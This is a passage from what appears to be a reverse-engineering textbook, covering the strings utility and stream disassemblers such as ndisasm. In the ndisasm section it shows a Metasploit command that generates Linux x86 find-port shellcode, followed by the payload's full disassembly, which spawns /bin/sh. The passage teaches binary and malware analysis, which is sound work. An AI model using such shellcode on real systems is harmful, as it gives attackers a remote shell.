Deep Inspection Tools

So far, we have discussed tools that perform a cursory analysis of files based on minimal knowledge of those files’ internal structure. We have also seen tools capable of extracting specific pieces of data from files based on very detailed knowledge of a file’s structure. In this section we discuss tools designed to extract specific types of information independently of the type of file being analyzed.


It is occasionally useful to ask more generic questions regarding file content, questions that don’t necessarily require any specific knowledge of a file’s structure. One such question is “Does this file contain any embedded strings?” Of course, we must first answer the question “What exactly constitutes a string?” Let’s loosely define a string as a consecutive sequence of printable characters. This definition is often augmented to specify a minimum length and a specific character set. Thus, we could specify a search for all sequences of at least four consecutive ASCII printable characters and print the results to the console. Searches for such strings are generally not limited in any way by the structure of a file. You can search for strings in an ELF binary just as easily as you can search for strings in a Microsoft Word document.

The strings utility is designed specifically to extract string content from files, often without regard for the format of those files. Using strings with its default settings (7-bit ASCII sequences of at least four characters) might yield something like the following:

idabook# strings ch2_example
usage: ch2_example [max]
A simple guessing game!
Please guess a number between 1 and %d.
Invalid input, quitting!
Congratulations, you got it in %d attempt(s)!
Sorry too low, please try again
Sorry too high, please try again

Unfortunately, while we see some strings that look like they might be output by the program, other strings appear to be function names and library names. We should be careful not to jump to any conclusions regarding the behavior of the program. Analysts often fall into the trap of attempting to deduce the behavior of a program based on the output of strings. Remember, the presence of a string within a binary in no way indicates that the string is ever used in any manner by that binary.

Some final notes on the use of strings:

  • When using strings on executable files, it is important to remember that, by default, only the loadable, initialized sections of the file will be scanned. Use the -a command-line argument to force strings to scan the entire input file.

  • strings gives no indication of where, within a file, a string is located. Use the -t command-line argument to have strings print file offset information for each string found.

  • Many files utilize alternate character sets. Utilize the -e command-line argument to cause strings to search for wide characters such as 16-bit Unicode.


As mentioned earlier, a number of tools are available to generate dead listing–style disassemblies of binary object files. PE, ELF, and Mach-O binaries can be disassembled using dumpbin, objdump, and otool, respectively. None of those, however, can deal with arbitrary blocks of binary data. You will occasionally be confronted with a binary file that does not conform to a widely used file format, in which case you will need tools capable of beginning the disassembly process at user-specified offsets.

Two examples of such stream disassemblers for the x86 instruction set are ndisasm and diStorm.[15] ndisasm is a utility included with the Netwide Assembler (NASM).[16] The following example illustrates the use of ndisasm to disassemble a piece of shellcode generated using the Metasploit framework.[17]

idabook# ./msfpayload linux/x86/shell_findport CPORT=4444 R > fs
idabook# ls -l fs
-rw-r--r-- 1 ida ida 62 Dec 11 15:49 fs
idabook# ndisasm -u fs
00000000  31D2              xor edx,edx
00000002  52                push edx
00000003  89E5              mov ebp,esp
00000005  6A07              push byte +0x7
00000007  5B                pop ebx
00000008  6A10              push byte +0x10
0000000A  54                push esp
0000000B  55                push ebp
0000000C  52                push edx
0000000D  89E1              mov ecx,esp
0000000F  FF01              inc dword [ecx]
00000011  6A66              push byte +0x66
00000013  58                pop eax
00000014  CD80              int 0x80
00000016  66817D02115C      cmp word [ebp+0x2],0x5c11
0000001C  75F1              jnz 0xf
0000001E  5B                pop ebx
0000001F  6A02              push byte +0x2
00000021  59                pop ecx
00000022  B03F              mov al,0x3f
00000024  CD80              int 0x80
00000026  49                dec ecx
00000027  79F9              jns 0x22
00000029  52                push edx
0000002A  682F2F7368        push dword 0x68732f2f
0000002F  682F62696E        push dword 0x6e69622f
00000034  89E3              mov ebx,esp
00000036  52                push edx
00000037  53                push ebx
00000038  89E1              mov ecx,esp
0000003A  B00B              mov al,0xb
0000003C  CD80              int 0x80

The flexibility of stream disassembly is useful in many situations. One scenario involves the analysis of computer network attacks in which network packets may contain shellcode. Stream disassemblers can be used to disassemble the portions of the packet that contain shellcode in order to analyze the behavior of the malicious payload. Another situation involves the analysis of ROM images for which no layout reference can be located. Portions of the ROM will contain data, while other portions will contain code. Stream disassemblers can be used to disassemble just those portions of the image thought to be code.

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